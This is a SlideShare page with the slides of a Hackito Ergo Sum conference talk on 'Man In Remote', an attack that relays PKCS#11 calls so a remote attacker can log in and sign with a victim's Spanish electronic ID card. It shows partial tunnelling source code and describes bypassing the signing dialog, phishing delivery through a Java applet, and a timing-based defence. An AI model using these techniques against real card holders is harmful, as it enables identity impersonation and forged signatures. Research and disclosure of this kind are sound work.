SlideShare a Scribd company logo

Remotely use Spanish National Electronic ID with MiR

Hackito Ergo Sum
Hackito Ergo Sum
Technology
1 of 47
Download to read offline
Remotely Using the Spanish National Electronic ID
ToC • Introduction to DNIe • Man In Remote • Live Demo! • MiR Reloaded • Solution
Introduction • Law to promote online transactions • Administrative Tasks Online • Citizen-Friendliness #fail
Introduction • General Purpose Microprocessor • CriptoChip • Serial Port Communication
Introduction • Biometric System: Match On Card • Authentication Certificates • Non-Repudiation Certificates • Component Certificates
Introduction • PC / SC – Integration of SmartCards with PCs – API for Communication – Multiplataform – Functionality • Initialization • Readers Management • State • Sending/Receiving Command (APDUs)
Introduction • Secure Channel – UNE 14890 – APDUs are encrypted – Peers mutually authenticated • Public Key Exchange • Authentication • Channel’s Key Derivation
Introduction • CSP Applications – Microsoft Propossal CSP PC / SC – CryptoAPI Extensions DNIe Reader
Introduction • PKCS#11 – RSA standard Applications (http://www.rsa.com/rsalabs/node.asp?id=2133) – Generic API to access crypto- PKCS#11 devices – Token as access unit PC / SC – Manages Several Objects DNIe • Public, Private Keys Reader • Data & Certs
Introduction • Authenticating Users in Web Services – Java Applet • Intrusive method – SSL + Client Certificate • “Transparent”
Introduction • Java Applet – User needs to download an Applet – Annoying Security Warnings
Introduction DNIe WebBrowser Web Server OCSP Init Session Get Client Cert Validate PIN Get Auth Cert Sign Msgs Validate Cert
Introduction • Physhical Security – Power Sensors – Glitch Detection – Passivation Layer – Clock Frequency Changes Detection – Current Changes Detection • EAL4+ Level
Man In Remote • Motivation • Definition • Description • Demo
Man In Remote • Motivation – Systems using physical devices – Duplication – Remote Authentication
Man In Remote • Definition Live usage of the functionalities provided by a security device when this is plugged into a different computer
Man In Remote Web Browser PKCS#11
Man In Remote Web Browser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
Man In Remote Web Browser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
Man In Remote • MiR - Attacker – Library interfacing with PKCS#11 – No Local Operations – Remote Object Interface
Man In Remote • MiR - Attacker 1. Data Packaging 2. Method Invokation 3. Data Unpackaging
Man In Remote • MiR - Victim – Client of the official PKCS#11 – Waits for Attaker’s Requests – Remote Object
Man In Remote • MiR - Victim 1. Data Unpacking 2. Invoking Methods from the Official PKCS#11 3. Retrieve results and pack them back
Man In Remote - Attacker’s Src CK_DEFINE_FUNCTION(CK_RV,C_Initialize)(…) { #ifdef _REMOTE_PKCS11_ { DataMarshalling *d = NULL; […] if (connect(client, (struct sockaddr *)&sock, sizeof(sock)) == SOCKET_ERROR) {[…]} d = new DataMarshalling(client); d->setMsgType("C_Initialize"); d->packInt((char *)&a); d->sendData(); delete d; }
Man In Remote - Attacker’s Src #else InicializarFunciones("UsrPKCS11.dll"); rv = pFunctionList->C_Initialize(pInitArgs); #endif #ifdef _DEBUG_PKCS11_ fprintf(fout, "C_Initialize ret: %dn", rv); #endif exit: return rv; }
Man In Remote - Attacker’s Src CK_DEFINE_FUNCTION(CK_RV,C_OpenSession)() { CK_RV rv = CKR_OK; DataMarshalling *d = new DataMarshalling(client); d->setMsgType("C_OpenSession"); { /* * Open session */ unsigned int sessionId = 0; DataMarshalling *d2 = new DataMarshalling(client); d->packInt((char *)&slotID); d->packInt((char *)&flags); d->sendData();
Man In Remote - Attacker’s Src d2->recvData(); if (strcmp(d2->getMsgType(), d->getMsgType())) { rv = CKR_CANCEL; goto exit; } rv = d2->unpackInt(); sessionId = d2->unpackInt(); delete d2; *phSession = sessionId; } delete d; exit: return rv; }
Man In Remote - Victim’s Src } else if (!strcmp(d->getMsgType(), "C_OpenSession")) { slotId = d->unpackInt(); flags = d->unpackInt(); { DataMarshalling *d2 = new DataMarshalling(client); /* * Opening session */ ret = C_OpenSession(slotId, flags, NULL, NULL, &sessionId); d2->setMsgType(d->getMsgType()); d2->packInt((char *)&ret); d2->packInt((char *)&sessionId); d2->sendData(); delete d2; } }
Man In Remote - Live Demo! Social Security Web Browser PKCS#11 PKCS#11 PKCS#11 Tunneling MiR MiR
Man In Remote • PKCS#11 Flow: Initialization C_Initialize C_OpenSession C_GetInfo C_GenerateRandom C_GetSlotList C_SeedRandom C_FindObjectsInit C_GetSlotList C_FindObjects C_GetSlotInfo C_FindObjectsFinal C_GetTokenInfo C_GetSlotInfo C_GetMechanismList C_GetSessionInfo C_GetMechanismList
Man In Remote • PKCS#11 Flow: Login C_FindObjectsInit C_GetSessionInfo C_FindObjects C_GetSessionInfo C_FindObjectsFinal C_FindObjectsInit C_FindObjects C_GetSlotInfo C_FindObjectsFinal C_GetSessionInfo C_GetSlotInfo C_Login C_GetAttributeValue C_GetSlotInfo C_GetAttributeValue C_GetSessionInfo C_GetSessionInfo
Man In Remote • PKCS#11 Flow: Signing C_SignInit C_Sign C_GetSlotInfo C_CloseSession C_GetSessionInfo C_GetSlotInfo C_GetSessionInfo
Man In Remote • Dialog when using non-Repudiation Cert
Man In Remote • Bypassing the dialog
MiR Reloaded • Moving Victim’s part to a Java Applet • Security Warning
MiR Reloaded • Java Version – Sun PKCS#11 – Easy distribution as Phishing Attack – iframe + applet
MiR Reloaded • Till now we have achieve – Remote Authentication – Remote Signing – An Attacker with the PIN has full access to DNIe
MiR Reloaded • Second method of Authentication: Applet – Token Signing – Signed Token Uploaded via POST – No need of PKCS#11 Tunneling – Send Token and Get it Signed
MiR Reloaded Web Browser <form> <form> <input id=“token” <input id=“token” value=“AAAAAA”> value=“903234”> </form> </form>
MiR Reloaded Web Browser <form> <input id=“token” 1 Token Phishing / value=“903234”> value=“AAAAAA”> Trojan </form> 2 Signed Token
MiR: Solution • Complex Solution • We can’t trust the PC • Servers can’t do any extra check • Smart Cards are not so “smart”
MiR: Solution • Based on Response Times • Fixed Processing Times • Network Latency • DNIe could abort a potential attack
MiR: Solution t R1 t R2 t p ( R1 ) tlocal t R1 Local Processing t R2 t p ( R1 )
MiR: Solution t R1 t R2 t p ( R1 ) tlocal 2t RTT t R1 tRTT Local Processing MiR tRTT t R2 t p ( R1 )
MiR: Solution t R1 t R2 t p ( R1 ) tlocal t R1 t R2 t p ( R1 ) tlocal 2t RTT t R1 t R2 t R1 t R2
MiR: “Is this real Life?” • Similar Attacks – http://www.itworld.com/security/134958/smart- cards-no-match-online-spies
Remotely use Spanish National Electronic ID with MiR

Recommended

Advanced Encryption on the JVM v0.2.8
Advanced Encryption on the JVM v0.2.8Advanced Encryption on the JVM v0.2.8
Advanced Encryption on the JVM v0.2.8Matthew McCullough
 
Encryption Boot Camp at JavaZone 2010
Encryption Boot Camp at JavaZone 2010Encryption Boot Camp at JavaZone 2010
Encryption Boot Camp at JavaZone 2010Matthew McCullough
 
Stateless Microservice Security via JWT and MicroProfile - Mexico
Stateless Microservice Security via JWT and MicroProfile - MexicoStateless Microservice Security via JWT and MicroProfile - Mexico
Stateless Microservice Security via JWT and MicroProfile - MexicoOtávio Santana
 
Stateless Microservice Security via JWT and MicroProfile - Guatemala
Stateless Microservice Security via JWT and MicroProfile - GuatemalaStateless Microservice Security via JWT and MicroProfile - Guatemala
Stateless Microservice Security via JWT and MicroProfile - GuatemalaOtávio Santana
 
Stateless Microservice Security via JWT and MicroProfile - ES
Stateless Microservice Security via JWT and MicroProfile - ES Stateless Microservice Security via JWT and MicroProfile - ES
Stateless Microservice Security via JWT and MicroProfile - ES Otavio Santana
 
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018Codemotion
 
Cryptography 101 for Java developers
Cryptography 101 for Java developersCryptography 101 for Java developers
Cryptography 101 for Java developersMichel Schudel
 
Tutorial s crypto api session keys
Tutorial s crypto api session keysTutorial s crypto api session keys
Tutorial s crypto api session keysDr. Edwin Hernandez
 

Recommended

Advanced Encryption on the JVM v0.2.8
Advanced Encryption on the JVM v0.2.8Advanced Encryption on the JVM v0.2.8
Advanced Encryption on the JVM v0.2.8Matthew McCullough
 
Encryption Boot Camp at JavaZone 2010
Encryption Boot Camp at JavaZone 2010Encryption Boot Camp at JavaZone 2010
Encryption Boot Camp at JavaZone 2010Matthew McCullough
 
Stateless Microservice Security via JWT and MicroProfile - Mexico
Stateless Microservice Security via JWT and MicroProfile - MexicoStateless Microservice Security via JWT and MicroProfile - Mexico
Stateless Microservice Security via JWT and MicroProfile - MexicoOtávio Santana
 
Stateless Microservice Security via JWT and MicroProfile - Guatemala
Stateless Microservice Security via JWT and MicroProfile - GuatemalaStateless Microservice Security via JWT and MicroProfile - Guatemala
Stateless Microservice Security via JWT and MicroProfile - GuatemalaOtávio Santana
 
Stateless Microservice Security via JWT and MicroProfile - ES
Stateless Microservice Security via JWT and MicroProfile - ES Stateless Microservice Security via JWT and MicroProfile - ES
Stateless Microservice Security via JWT and MicroProfile - ES Otavio Santana
 
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018
Simone Bronzini - Weaknesses of blockchain applications - Codemotion Milan 2018Codemotion
 
Cryptography 101 for Java developers
Cryptography 101 for Java developersCryptography 101 for Java developers
Cryptography 101 for Java developersMichel Schudel
 
Tutorial s crypto api session keys
Tutorial s crypto api session keysTutorial s crypto api session keys
Tutorial s crypto api session keysDr. Edwin Hernandez
 
Secure Socket Layer
Secure Socket LayerSecure Socket Layer
Secure Socket Layerdwitigajab
 
DevDay: Cryptographic Agility, Kostas Chalkias
DevDay: Cryptographic Agility, Kostas ChalkiasDevDay: Cryptographic Agility, Kostas Chalkias
DevDay: Cryptographic Agility, Kostas ChalkiasR3
 
Bitcoin protocol for developers at techfest
Bitcoin protocol for developers at techfestBitcoin protocol for developers at techfest
Bitcoin protocol for developers at techfestAlberto Gomez Toribio
 
FIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclaveFIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclavewolfSSL
 
Seguridad en microservicios via micro profile jwt
Seguridad en microservicios via micro profile jwtSeguridad en microservicios via micro profile jwt
Seguridad en microservicios via micro profile jwtCésar Hernández
 
Ssl for e commerce
Ssl for e commerceSsl for e commerce
Ssl for e commerceshahab zebari
 
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)Svetlin Nakov
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Svetlin Nakov
 
CPK Cryptosystem In Solaris
CPK Cryptosystem In SolarisCPK Cryptosystem In Solaris
CPK Cryptosystem In SolarisZhi Guan
 
SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)Maarten Mulders
 
Hyperledger introduction
Hyperledger introductionHyperledger introduction
Hyperledger introductionpoznanblockchainmeetup
 
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015CSO_Presentations
 
BalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletBalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletNemanja Nikodijević
 
How do private transactions work on Quorum
How do private transactions work on QuorumHow do private transactions work on Quorum
How do private transactions work on QuorumChainstack
 
wolfSSL and TLS 1.3
wolfSSL and TLS 1.3wolfSSL and TLS 1.3
wolfSSL and TLS 1.3wolfSSL
 
Hyperledger fabric
Hyperledger fabricHyperledger fabric
Hyperledger fabricCeline George
 
OmniLedger
OmniLedgerOmniLedger
OmniLedgerSIYIMA4
 
SSL/TLS for Mortals (JavaZone)
SSL/TLS for Mortals (JavaZone)SSL/TLS for Mortals (JavaZone)
SSL/TLS for Mortals (JavaZone)Maarten Mulders
 
Hyperledger Consensus Algorithms
Hyperledger Consensus AlgorithmsHyperledger Consensus Algorithms
Hyperledger Consensus AlgorithmsMabelOza12
 
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)Svetlin Nakov
 
snort.ppt
snort.pptsnort.ppt
snort.pptSenthil Vit
 
Day 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server RedirectionDay 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server Redirectionvngundi
 

More Related Content

What's hot

Secure Socket Layer
Secure Socket LayerSecure Socket Layer
Secure Socket Layerdwitigajab
 
DevDay: Cryptographic Agility, Kostas Chalkias
DevDay: Cryptographic Agility, Kostas ChalkiasDevDay: Cryptographic Agility, Kostas Chalkias
DevDay: Cryptographic Agility, Kostas ChalkiasR3
 
Bitcoin protocol for developers at techfest
Bitcoin protocol for developers at techfestBitcoin protocol for developers at techfest
Bitcoin protocol for developers at techfestAlberto Gomez Toribio
 
FIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclaveFIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclavewolfSSL
 
Seguridad en microservicios via micro profile jwt
Seguridad en microservicios via micro profile jwtSeguridad en microservicios via micro profile jwt
Seguridad en microservicios via micro profile jwtCésar Hernández
 
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)Svetlin Nakov
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Svetlin Nakov
 
CPK Cryptosystem In Solaris
CPK Cryptosystem In SolarisCPK Cryptosystem In Solaris
CPK Cryptosystem In SolarisZhi Guan
 
SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)Maarten Mulders
 
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015CSO_Presentations
 
BalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletBalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletNemanja Nikodijević
 
How do private transactions work on Quorum
How do private transactions work on QuorumHow do private transactions work on Quorum
How do private transactions work on QuorumChainstack
 
wolfSSL and TLS 1.3
wolfSSL and TLS 1.3wolfSSL and TLS 1.3
wolfSSL and TLS 1.3wolfSSL
 
OmniLedger
OmniLedgerOmniLedger
OmniLedgerSIYIMA4
 
SSL/TLS for Mortals (JavaZone)
SSL/TLS for Mortals (JavaZone)SSL/TLS for Mortals (JavaZone)
SSL/TLS for Mortals (JavaZone)Maarten Mulders
 
Hyperledger Consensus Algorithms
Hyperledger Consensus AlgorithmsHyperledger Consensus Algorithms
Hyperledger Consensus AlgorithmsMabelOza12
 
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)Svetlin Nakov
 

What's hot (20)

Secure Socket Layer
Secure Socket LayerSecure Socket Layer
Secure Socket Layer
 
DevDay: Cryptographic Agility, Kostas Chalkias
DevDay: Cryptographic Agility, Kostas ChalkiasDevDay: Cryptographic Agility, Kostas Chalkias
DevDay: Cryptographic Agility, Kostas Chalkias
 
Bitcoin protocol for developers at techfest
Bitcoin protocol for developers at techfestBitcoin protocol for developers at techfest
Bitcoin protocol for developers at techfest
 
FIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure EnclaveFIPS 140-2 Validations in a Secure Enclave
FIPS 140-2 Validations in a Secure Enclave
 
Seguridad en microservicios via micro profile jwt
Seguridad en microservicios via micro profile jwtSeguridad en microservicios via micro profile jwt
Seguridad en microservicios via micro profile jwt
 
Ssl for e commerce
Ssl for e commerceSsl for e commerce
Ssl for e commerce
 
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
Blockchain Cryptography for Developers (Nakov @ BGWebSummit 2018)
 
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
Cryptography for Java Developers: Nakov jProfessionals (Jan 2019)
 
CPK Cryptosystem In Solaris
CPK Cryptosystem In SolarisCPK Cryptosystem In Solaris
CPK Cryptosystem In Solaris
 
SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)SSL/TLS for Mortals (GOTO Berlin)
SSL/TLS for Mortals (GOTO Berlin)
 
Hyperledger introduction
Hyperledger introductionHyperledger introduction
Hyperledger introduction
 
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
Peter Gutmann Presentation - CSO Perspectives Roadshow Auckland 9th Mar 2015
 
BalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency walletBalCCon2k18 - Towards the perfect cryptocurrency wallet
BalCCon2k18 - Towards the perfect cryptocurrency wallet
 
How do private transactions work on Quorum
How do private transactions work on QuorumHow do private transactions work on Quorum
How do private transactions work on Quorum
 
wolfSSL and TLS 1.3
wolfSSL and TLS 1.3wolfSSL and TLS 1.3
wolfSSL and TLS 1.3
 
Hyperledger fabric
Hyperledger fabricHyperledger fabric
Hyperledger fabric
 
OmniLedger
OmniLedgerOmniLedger
OmniLedger
 
SSL/TLS for Mortals (JavaZone)
SSL/TLS for Mortals (JavaZone)SSL/TLS for Mortals (JavaZone)
SSL/TLS for Mortals (JavaZone)
 
Hyperledger Consensus Algorithms
Hyperledger Consensus AlgorithmsHyperledger Consensus Algorithms
Hyperledger Consensus Algorithms
 
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
Blockchain Cryptography for Developers (Nakov @ BlockWorld 2018, San Jose)
 

Similar to Remotely use Spanish National Electronic ID with MiR

Day 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server RedirectionDay 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server Redirectionvngundi
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiYossi Sassi
 
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...CODE BLUE
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataInderjeet Singh
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Rob Fuller
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Chris Gates
 
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseFelipe Prado
 
Hacktive Directory Forensics - HackCon18, Oslo
Hacktive Directory Forensics - HackCon18, OsloHacktive Directory Forensics - HackCon18, Oslo
Hacktive Directory Forensics - HackCon18, OsloYossi Sassi
 
Achieving Pci Compliace
Achieving Pci CompliaceAchieving Pci Compliace
Achieving Pci CompliaceDenish Patel
 
BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.Jakub Kałużny
 
Protecting Financial Networks from Cyber Crime
Protecting Financial Networks from Cyber CrimeProtecting Financial Networks from Cyber Crime
Protecting Financial Networks from Cyber CrimeLancope, Inc.
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptcemporku
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdftehkotak4
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligencePriyanka Aash
 
Advanced RingCentral API Use Cases
Advanced RingCentral API Use CasesAdvanced RingCentral API Use Cases
Advanced RingCentral API Use CasesByrne Reese
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat Security Conference
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCanSecWest
 
Intro to sysdig in 15 minutes
Intro to sysdig in 15 minutesIntro to sysdig in 15 minutes
Intro to sysdig in 15 minutesSysdig
 

Similar to Remotely use Spanish National Electronic ID with MiR (20)

snort.ppt
snort.pptsnort.ppt
snort.ppt
 
Day 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server RedirectionDay 2 Dns Cert 4b Name Server Redirection
Day 2 Dns Cert 4b Name Server Redirection
 
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi SassiInSecure Remote Operations - NullCon 2023 by Yossi Sassi
InSecure Remote Operations - NullCon 2023 by Yossi Sassi
 
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
[CB20]-U25 Automated Hunting for Cross-Server Xrefs in Microsoft RPC and COM ...
 
Ransomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your DataRansomware- What you need to know to Safeguard your Data
Ransomware- What you need to know to Safeguard your Data
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
 
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defenseDEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
DEF CON 23 - Sean - metcalf - red vs blue ad attack and defense
 
Hacktive Directory Forensics - HackCon18, Oslo
Hacktive Directory Forensics - HackCon18, OsloHacktive Directory Forensics - HackCon18, Oslo
Hacktive Directory Forensics - HackCon18, Oslo
 
Achieving Pci Compliace
Achieving Pci CompliaceAchieving Pci Compliace
Achieving Pci Compliace
 
BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.BSides London 2015 - Proprietary network protocols - risky business on the wire.
BSides London 2015 - Proprietary network protocols - risky business on the wire.
 
Protecting Financial Networks from Cyber Crime
Protecting Financial Networks from Cyber CrimeProtecting Financial Networks from Cyber Crime
Protecting Financial Networks from Cyber Crime
 
Modul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.pptModul 2 - Footprinting Scanning Enumeration.ppt
Modul 2 - Footprinting Scanning Enumeration.ppt
 
modul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdfmodul2-footprintingscanningenumeration.pdf
modul2-footprintingscanningenumeration.pdf
 
Cryptography
CryptographyCryptography
Cryptography
 
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm IntelligenceOrder vs. Mad Science: Analyzing Black Hat Swarm Intelligence
Order vs. Mad Science: Analyzing Black Hat Swarm Intelligence
 
Advanced RingCentral API Use Cases
Advanced RingCentral API Use CasesAdvanced RingCentral API Use Cases
Advanced RingCentral API Use Cases
 
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
BlueHat v17 || Dyre to Trickbot: An Inside Look at TLS-Encrypted Command-And-...
 
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoTCSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
CSW2017 Yuhao song+Huimingliu cyber_wmd_vulnerable_IoT
 
Intro to sysdig in 15 minutes
Intro to sysdig in 15 minutesIntro to sysdig in 15 minutes
Intro to sysdig in 15 minutes
 

More from Hackito Ergo Sum

HES 2011 - Gal Diskin - Binary instrumentation for hackers - Lightning-talk
HES 2011 - Gal Diskin - Binary instrumentation for hackers - Lightning-talkHES 2011 - Gal Diskin - Binary instrumentation for hackers - Lightning-talk
HES 2011 - Gal Diskin - Binary instrumentation for hackers - Lightning-talkHackito Ergo Sum
 
HES2011 - Jon Oberheide and Dan Rosenberg - Stackjacking
HES2011 - Jon Oberheide and Dan Rosenberg - StackjackingHES2011 - Jon Oberheide and Dan Rosenberg - Stackjacking
HES2011 - Jon Oberheide and Dan Rosenberg - StackjackingHackito Ergo Sum
 
HES2011 - Sebastien Tricaud - Capture me if you can
HES2011 - Sebastien Tricaud - Capture me if you canHES2011 - Sebastien Tricaud - Capture me if you can
HES2011 - Sebastien Tricaud - Capture me if you canHackito Ergo Sum
 
HES2011 - Eloi Vanderbeken - Hackito Ergo Sum Crackme
HES2011 - Eloi Vanderbeken - Hackito Ergo Sum CrackmeHES2011 - Eloi Vanderbeken - Hackito Ergo Sum Crackme
HES2011 - Eloi Vanderbeken - Hackito Ergo Sum CrackmeHackito Ergo Sum
 
HES2011 - Aaron Portnoy and Logan Brown - Black Box Auditing Adobe Shockwave
HES2011 - Aaron Portnoy and Logan Brown - Black Box Auditing Adobe ShockwaveHES2011 - Aaron Portnoy and Logan Brown - Black Box Auditing Adobe Shockwave
HES2011 - Aaron Portnoy and Logan Brown - Black Box Auditing Adobe ShockwaveHackito Ergo Sum
 
HES2011 - Jon Larimer - Autorun Vulnerabilities on Linux
HES2011 - Jon Larimer - Autorun Vulnerabilities on LinuxHES2011 - Jon Larimer - Autorun Vulnerabilities on Linux
HES2011 - Jon Larimer - Autorun Vulnerabilities on LinuxHackito Ergo Sum
 
HES2011 - James Oakley and Sergey bratus-Exploiting-the-Hard-Working-DWARF
